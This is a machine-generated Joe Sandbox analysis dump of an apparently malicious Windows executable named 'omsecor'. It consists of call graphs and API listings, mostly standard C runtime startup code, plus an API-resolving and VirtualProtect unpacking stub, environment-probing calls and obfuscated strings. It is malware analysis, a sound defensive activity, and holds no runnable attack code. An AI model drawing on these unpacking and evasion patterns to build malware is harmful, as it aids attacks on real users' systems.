LCMapStringW 4643->4648 4643->4655 4644->4623 4645->4655 4646->4643 4649 406654 _malloc 67 API calls 4646->4649 4647->4642 4650 406654 _malloc 67 API calls 4647->4650 4651 40641d WideCharToMultiByte 4648->4651 4652 40643f 4648->4652 4649->4643 4650->4642 4651->4652 4653 405ef0 __freea 67 API calls 4652->4653 4653->4655 4656 406541 4654->4656 4657 406545 4654->4657 4655->4636 4660 405ef0 __freea 67 API calls 4656->4660 4659 406eca ___convertcp 74 API calls 
4657->4659 4659->4656 4660->4661 4661->4634 4661->4638 4662->4477 4666 404c76 4663->4666 4667 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4666->4667 4668 404c87 4667->4668 4668->4407 4669 406bf0 RtlUnwind 4670 4040f1 4671 4040f4 4670->4671 4674 406a50 4671->4674 4675 406a75 4674->4675 4676 406a7c 4674->4676 4677 402465 _abort 67 API calls 4675->4677 4686 404578 4676->4686 4677->4676 4680 406a8d _memset 4682 406b3b 4680->4682 4685 406b10 SetUnhandledExceptionFilter UnhandledExceptionFilter 4680->4685 4710 4023ea 4682->4710 4685->4682 4687 401b21 _raise 67 API calls 4686->4687 4688 404583 4687->4688 4688->4680 4689 404585 4688->4689 4692 404591 _raise 4689->4692 4690 4045ed 4691 4045ce 4690->4691 4696 4045fc 4690->4696 4695 401b21 _raise 67 API calls 4691->4695 4692->4690 4692->4691 4693 4045b8 4692->4693 4699 4045b4 4692->4699 4694 401cc6 _raise 67 API calls 4693->4694 4697 4045bd _siglookup 4694->4697 4695->4697 4698 40427c _raise 67 API calls 4696->4698 4701 404663 4697->4701 4703 4023ea _raise 67 API calls 4697->4703 4704 4045c6 _raise 4697->4704 4700 404601 4698->4700 4699->4693 4699->4696 4702 40421d _raise 67 API calls 4700->4702 4705 4034ee __lock 67 API calls 4701->4705 4706 40466e 4701->4706 4702->4704 4703->4701 4704->4680 4705->4706 4707 401b18 _raise 67 API calls 4706->4707 4708 4046a3 4706->4708 4707->4708 4713 4046f9 4708->4713 4711 4022f7 _raise 67 API calls 4710->4711 4712 4023f7 4711->4712 4714 404706 4713->4714 4715 4046ff 4713->4715 4714->4704 4717 403416 RtlLeaveCriticalSection 4715->4717 4717->4714 4718 401e76 GetModuleHandleA 4719 401e91 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4718->4719 4720 401e88 4718->4720 4722 401edb TlsAlloc 4719->4722 4751 401bca 4720->4751 4725 401ff5 4722->4725 4726 401f29 TlsSetValue 4722->4726 4726->4725 4727 401f3a 4726->4727 4762 402419 4727->4762 4730 401aaa __init_pointers 67 API calls 4731 401f4a 4730->4731 4732 401aaa __init_pointers 67 API calls 4731->4732 4733 401f5a 4732->4733 4734 
401aaa __init_pointers 67 API calls 4733->4734 4735 401f6a 4734->4735 4736 401aaa __init_pointers 67 API calls 4735->4736 4737 401f7a 4736->4737 4769 403378 4737->4769 4740 401ff0 4741 401bca __mtterm 70 API calls 4740->4741 4741->4725 4742 401b21 _raise 67 API calls 4743 401f9b 4742->4743 4743->4740 4744 404032 __calloc_crt 67 API calls 4743->4744 4745 401fb4 4744->4745 4745->4740 4746 401b21 _raise 67 API calls 4745->4746 4747 401fce 4746->4747 4747->4740 4748 401fd5 4747->4748 4749 401c07 _raise 67 API calls 4748->4749 4750 401fdd GetCurrentThreadId 4749->4750 4750->4725 4752 401bd4 4751->4752 4753 401be0 4751->4753 4755 401b21 _raise 67 API calls 4752->4755 4754 401bf4 TlsFree 4753->4754 4756 401c02 4753->4756 4754->4756 4755->4753 4757 4033db RtlDeleteCriticalSection 4756->4757 4758 4033f3 4756->4758 4759 403f64 ___free_lconv_mon 67 API calls 4757->4759 4760 403405 RtlDeleteCriticalSection 4758->4760 4761 401e8d 4758->4761 4759->4756 4760->4758 4763 401b18 _raise 67 API calls 4762->4763 4764 40241f __init_pointers 4763->4764 4773 404106 4764->4773 4767 401aaa __init_pointers 67 API calls 4768 401f3f 4767->4768 4768->4730 4770 403381 4769->4770 4771 404763 ___crtInitCritSecAndSpinCount 67 API calls 4770->4771 4772 401f87 4770->4772 4771->4770 4772->4740 4772->4742 4774 401aaa __init_pointers 67 API calls 4773->4774 4775 402451 4774->4775 4775->4767 4776 401877 4777 401886 4776->4777 4778 40188c 4776->4778 4779 4023ea _raise 67 API calls 4777->4779 4782 40240a 4778->4782 4779->4778 4781 401891 _raise 4783 4022f7 _raise 67 API calls 4782->4783 4784 402415 4783->4784 4784->4781 4785 4027fa 4786 402807 4785->4786 4790 40280c _strlen 4785->4790 4787 403f46 ___initmbctable 111 API calls 4786->4787 4787->4790 4788 402818 4789 404032 __calloc_crt 67 API calls 4797 40283f _strlen 4789->4797 4790->4788 4790->4789 4791 40289a 4792 403f64 ___free_lconv_mon 67 API calls 4791->4792 4792->4788 4793 404032 __calloc_crt 67 API calls 4793->4797 4794 4028bf 4795 403f64 
___free_lconv_mon 67 API calls 4794->4795 4795->4788 4796 404bcb _strcpy_s 67 API calls 4796->4797 4797->4788 4797->4791 4797->4793 4797->4794 4797->4796 4798 404121 __invoke_watson 10 API calls 4797->4798 4798->4797 4799 4023fb 4800 4022f7 _raise 67 API calls 4799->4800 4801 402406 4800->4801 4884 40213b SetUnhandledExceptionFilter 3989 402f3e HeapCreate 3990 402f61 3989->3990 3991 402f5e 3989->3991 3998 402ee3 3990->3998 3994 402f94 3997 402f7f HeapDestroy 3997->3991 3999 4021f2 ___crtInitCritSecAndSpinCount 67 API calls 3998->3999 4000 402efa 3999->4000 4001 402f09 4000->4001 4002 404121 __invoke_watson 10 API calls 4000->4002 4003 402229 _raise 67 API calls 4001->4003 4002->4001 4004 402f15 4003->4004 4005 402f24 4004->4005 4006 404121 __invoke_watson 10 API calls 4004->4006 4005->3994 4007 405045 RtlAllocateHeap 4005->4007 4006->4005 4008 402f7a 4007->4008 4008->3994 4008->3997 4802 4020fe 4803 402136 4802->4803 4805 40210c 4802->4805 4805->4803 4806 4040cd 4805->4806 4807 4040d9 _raise 4806->4807 4808 401d3d _LocaleUpdate::_LocaleUpdate 67 API calls 4807->4808 4810 4040de 4808->4810 4809 406a50 _abort 69 API calls 4811 404100 _raise 4809->4811 4810->4809 4811->4803

                          Control-flow Graph

                          control_flow_graph 90 4012c0-4012e8 FindFirstFileA call 401080
                          APIs
                          • FindFirstFileA.KERNELBASE(ks clku .d,24468419), ref: 004012DD
                            • Part of subcall function 00401080: GetTickCount.KERNEL32 ref: 00401096
                            • Part of subcall function 00401080: GetDesktopWindow.USER32 ref: 004010B8
                            • Part of subcall function 00401080: GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                            • Part of subcall function 00401080: GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?), ref: 0040114B
                            • Part of subcall function 00401080: GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                            • Part of subcall function 00401080: GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopFileFindFirstGlobalNameTickTimesWindow
                          • String ID: ks clku .d
                          • API String ID: 973805369-4096487313
                          • Opcode ID: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction ID: 8201e92c16030f82e268503128fd01f75d7624b5287a074f0a6a6b49dcde2be8
                          • Opcode Fuzzy Hash: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction Fuzzy Hash: 13C012701042448FC330AF24DE0ABAA37E4AB48300F00093AA5E8E60A4DA3455598A8A

                          Control-flow Graph

                          APIs
                          • GetTickCount.KERNEL32 ref: 00401096
                          • GetDesktopWindow.USER32 ref: 004010B8
                          • GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                          • GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                          • GetCurrentProcess.KERNEL32(?), ref: 0040114B
                          • GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                          • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                          • GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          • cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp, xrefs: 00401131
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopGlobalNameTickTimesWindow
                          • String ID: cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp
                          • API String ID: 509927810-2920797944
                          • Opcode ID: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction ID: 30898c1c04428891cb82ceb7e239a2b08516cd6c9376f1465321758e23d54b14
                          • Opcode Fuzzy Hash: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction Fuzzy Hash: E55127F1D041744BDB288B298D54BB9BBF5ABC5305F0881BEE689B7381D5385A48CF28

                          Control-flow Graph

                          control_flow_graph 17 407a98-407a9f GetModuleHandleA 18 407aa1-407ab0 call 407ab5 17->18 19 407adf 17->19 29 407ab2-407abd GetProcAddress 18->29 30 407b17 18->30 20 407ae1-407ae5 19->20 22 407b24 call 407b29 20->22 23 407ae7-407aef GetModuleHandleA 20->23 26 407af1-407af9 23->26 26->26 28 407afb-407afe 26->28 28->20 31 407b00-407b02 28->31 29->19 33 407abf-407acc VirtualProtect 29->33 32 407b18-407b20 30->32 36 407b04-407b06 31->36 37 407b08-407b10 31->37 41 407b22 32->41 34 407ade 33->34 35 407ace-407adc VirtualProtect 33->35 34->19 35->34 39 407b11-407b12 GetProcAddress 36->39 37->39 39->30 41->28
                          APIs
                          • GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407AB5: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 53099f65029657388ac4b193d9ffb221688749bb3c6439a8311ebbe5e3b7996f
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: B501CC00F4D24539DA2051754C0197F7AA89A533687141677A111B72D3D9BCBE0692BF

                          Control-flow Graph

                          control_flow_graph 42 407a59-407a6e 43 407a70-407a78 42->43 44 407adf 42->44 43->44 46 407a7a-407aa8 call 407a98 43->46 45 407ae1-407ae5 44->45 47 407b24 call 407b29 45->47 48 407ae7-407aef GetModuleHandleA 45->48 54 407aaa 46->54 55 407b1e-407b20 46->55 51 407af1-407af9 48->51 51->51 53 407afb-407afe 51->53 53->45 56 407b00-407b02 53->56 57 407aac-407ab0 54->57 58 407b0d-407b10 54->58 59 407b22 55->59 60 407b18-407b1d 55->60 61 407b04-407b06 56->61 62 407b08-407b0c 56->62 65 407b17 57->65 66 407ab2-407abd GetProcAddress 57->66 63 407b11-407b12 GetProcAddress 58->63 59->53 60->55 61->63 62->58 63->65 65->60 66->44 67 407abf-407acc VirtualProtect 66->67 68 407ade 67->68 69 407ace-407adc VirtualProtect 67->69 68->44 69->68
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407A98: GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                            • Part of subcall function 00407A98: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: 8932c9a1b40894ead954c0166dfb712feb6fdadac19e13bdf209ed336a7ac0e8
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: DE21F621A4D2416EEB2186B44C0166B7BE49B13368F1946A7D141EB2C3D1BC7D4687AB

                          Control-flow Graph

                          control_flow_graph 70 407ab5-407abd GetProcAddress 71 407adf 70->71 72 407abf-407acc VirtualProtect 70->72 75 407ae1-407ae5 71->75 73 407ade 72->73 74 407ace-407adc VirtualProtect 72->74 73->71 74->73 76 407b24 call 407b29 75->76 77 407ae7-407aef GetModuleHandleA 75->77 79 407af1-407af9 77->79 79->79 80 407afb-407afe 79->80 80->75 81 407b00-407b02 80->81 82 407b04-407b06 81->82 83 407b08-407b10 81->83 84 407b11-407b17 GetProcAddress 82->84 83->84 87 407b18-407b20 84->87 89 407b22 87->89 89->80
                          APIs
                          • GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProcProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 2152742572-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 39b30828dda2cca0c429c80848ec8113aa03dbdf6ed959677c669bf53de2d5ad
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: 98F0F400E8D2043CEE2151B40C01ABBBBEC86633687241A27A211E72C3D4BC7E0692BB

                          Control-flow Graph

                          control_flow_graph 93 402f3e-402f5c HeapCreate 94 402f61-402f6e call 402ee3 93->94 95 402f5e-402f60 93->95 98 402f70-402f7d call 405045 94->98 99 402f94-402f97 94->99 98->99 102 402f7f-402f92 HeapDestroy 98->102 102->95
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,004017AC,00000001), ref: 00402F4F
                          • HeapDestroy.KERNEL32 ref: 00402F85
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CreateDestroy
                          • String ID:
                          • API String ID: 3296620671-0
                          • Opcode ID: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction ID: 98ebcd61208b82bef51758d9ec37e8992e6abd11400b15b10fa3614edeb5f36b
                          • Opcode Fuzzy Hash: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction Fuzzy Hash: D3E092706643029EEB40AB31AF0D72636E4E74078AF10843BF548F51E2EBBC8605AF4C
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 004020B3
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004020C8
                          • UnhandledExceptionFilter.KERNEL32(00408204), ref: 004020D3
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 004020EF
                          • TerminateProcess.KERNEL32(00000000), ref: 004020F6
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction ID: b20ca496c67c0111f9bdb02fdd2caa8760b953d18a2e8655b2b95bf976f6fc72
                          • Opcode Fuzzy Hash: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction Fuzzy Hash: 5321AEB5950304DFC710EF24EF48A453BB5BF88306F10403AE549B36A1E7B859A59F9E

                          Control-flow Graph

                          control_flow_graph 103 402465-40246f 104 402471-402478 103->104 105 402480-402483 104->105 106 40247a-40247e 104->106 107 402600-402604 105->107 108 402489-402495 call 404c30 105->108 106->104 106->105 111 40249b-4024a5 call 404c30 108->111 112 4025cc-4025d8 GetStdHandle 108->112 118 4024b4-4024ba 111->118 119 4024a7-4024ae 111->119 114 4025da-4025dd 112->114 115 4025ff 112->115 114->115 117 4025df-4025f9 call 404b40 WriteFile 114->117 115->107 117->115 118->115 122 4024c0-4024db call 404bcb 118->122 119->112 119->118 125 4024ea-402506 GetModuleFileNameA 122->125 126 4024dd-4024e7 call 404121 122->126 128 402508-40251d call 404bcb 125->128 129 40252e-402539 call 404b40 125->129 126->125 128->129 137 40251f-40252b call 404121 128->137 135 402573 129->135 136 40253b-402560 call 404b40 call 404a82 129->136 139 402575-402586 call 404a11 135->139 136->135 151 402562-402571 call 404121 136->151 137->129 146 402595-4025a8 call 404a11 139->146 147 402588-402592 call 404121 139->147 155 4025b7-4025ca call 404854 146->155 156 4025aa-4025b4 call 404121 146->156 147->146 151->139 155->115 156->155
                          APIs
                          • _strcpy_s.LIBCMT ref: 004024D1
                          • __invoke_watson.LIBCMT ref: 004024E2
                          • GetModuleFileNameA.KERNEL32(00000000,0040B091,00000104), ref: 004024FE
                          • _strcpy_s.LIBCMT ref: 00402513
                          • __invoke_watson.LIBCMT ref: 00402526
                          • _strlen.LIBCMT ref: 0040252F
                          • _strlen.LIBCMT ref: 0040253C
                          • __invoke_watson.LIBCMT ref: 00402569
                          • _strcat_s.LIBCMT ref: 0040257C
                          • __invoke_watson.LIBCMT ref: 0040258D
                          • _strcat_s.LIBCMT ref: 0040259E
                          • __invoke_watson.LIBCMT ref: 004025AF
                          • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77735E70,00000003,00402631,000000FC,0040667C,00000001,00000000,00000000,?,00403FFF,?,00000001), ref: 004025CE
                          • _strlen.LIBCMT ref: 004025EF
                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00403FFF,?,00000001,?,00403478,00000018,004093D0,0000000C,00403507,?), ref: 004025F9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                          • API String ID: 1879448924-4022980321
                          • Opcode ID: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction ID: 3ad8829dabe9c8e6b7970468b651ade891dcb41a26c93daa50347fadcc2e15d8
                          • Opcode Fuzzy Hash: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction Fuzzy Hash: CF3127B2A402153AE62136326F5EF2F314C9B91315F14013BFE09B26D6FABD9A1441FE

                          Control-flow Graph (legend: Executed / Not Executed)
                          control_flow_graph 162 401e76-401e86 GetModuleHandleA 163 401e91-401ed9 GetProcAddress * 4 162->163 164 401e88-401e90 call 401bca 162->164 166 401ef1-401f10 163->166 167 401edb-401ee2 163->167 170 401f15-401f23 TlsAlloc 166->170 167->166 169 401ee4-401eeb 167->169 169->166 171 401eed-401eef 169->171 172 401ff5 170->172 173 401f29-401f34 TlsSetValue 170->173 171->166 171->170 174 401ff7-401ff9 172->174 173->172 175 401f3a-401f89 call 402419 call 401aaa * 4 call 403378 173->175 188 401ff0 call 401bca 175->188 189 401f8b-401fa6 call 401b21 175->189 188->172 189->188 194 401fa8-401fba call 404032 189->194 194->188 197 401fbc-401fd3 call 401b21 194->197 197->188 201 401fd5-401fee call 401c07 GetCurrentThreadId 197->201 201->174
                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,004017BE), ref: 00401E7C
                          • __mtterm.LIBCMT ref: 00401E88
                            • Part of subcall function 00401BCA: TlsFree.KERNEL32(00000002,00401FF5), ref: 00401BF5
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 004033DC
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000002), ref: 00403406
                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00401E9E
                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00401EAB
                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00401EB8
                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00401EC5
                          • TlsAlloc.KERNEL32 ref: 00401F15
                          • TlsSetValue.KERNEL32(00000000), ref: 00401F30
                          • __init_pointers.LIBCMT ref: 00401F3A
                          • __calloc_crt.LIBCMT ref: 00401FAF
                          • GetCurrentThreadId.KERNEL32 ref: 00401FDF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                          • API String ID: 2125014093-3819984048
                          • Opcode ID: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction ID: 2b6f412a48510a2ea5e28321b190ff4220801d9e6bfc04da0c4d4af9d52f3434
                          • Opcode Fuzzy Hash: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction Fuzzy Hash: AF318F319483029BE7146F75AF05B063AA5AF40355712053FF861B22F5EF7C8490EB5E

                          Control-flow Graph (legend: Executed / Not Executed)
                          control_flow_graph 204 404854-404876 call 401b18 207 40492a-404934 204->207 208 40487c-40488b LoadLibraryA 204->208 211 404936-40493c 207->211 212 4049af-4049b7 207->212 209 404891-4048a1 GetProcAddress 208->209 210 404a0a 208->210 209->210 215 4048a7-4048e9 call 401aaa GetProcAddress call 401aaa GetProcAddress call 401aaa call 4021f2 209->215 216 404a0c-404a10 210->216 211->212 217 40493e-404957 call 401b21 * 2 211->217 213 4049b9-4049c2 call 401b21 212->213 214 4049ea-4049f8 call 401b21 212->214 213->214 227 4049c4-4049cb 213->227 214->210 226 4049fa-404a08 214->226 244 4048f8-4048fc 215->244 245 4048eb-4048f5 call 404121 215->245 217->212 232 404959-40495b 217->232 226->216 227->214 237 4049cd-4049d5 227->237 232->212 236 40495d-404961 232->236 246 404963-404974 236->246 247 40497c-404988 call 402229 236->247 237->214 239 4049d7-4049e0 call 401b21 237->239 239->214 252 4049e2-4049e7 239->252 244->207 250 4048fe-404914 GetProcAddress call 401aaa 244->250 245->244 246->247 258 404976-40497a 246->258 259 404997-40499b 247->259 260 40498a-404994 call 404121 247->260 250->207 264 404916-404925 GetProcAddress call 401aaa 250->264 252->214 258->212 258->247 262 4049a6-4049ad 259->262 263 40499d-4049a4 259->263 260->259 262->214 263->214 264->207
                          APIs
                          • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00404881
                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040489D
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048BA
                            • Part of subcall function 00401AAA: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                            • Part of subcall function 00401AAA: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048CF
                          • __invoke_watson.LIBCMT ref: 004048F0
                            • Part of subcall function 00404121: _memset.LIBCMT ref: 004041AD
                            • Part of subcall function 00404121: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004041CB
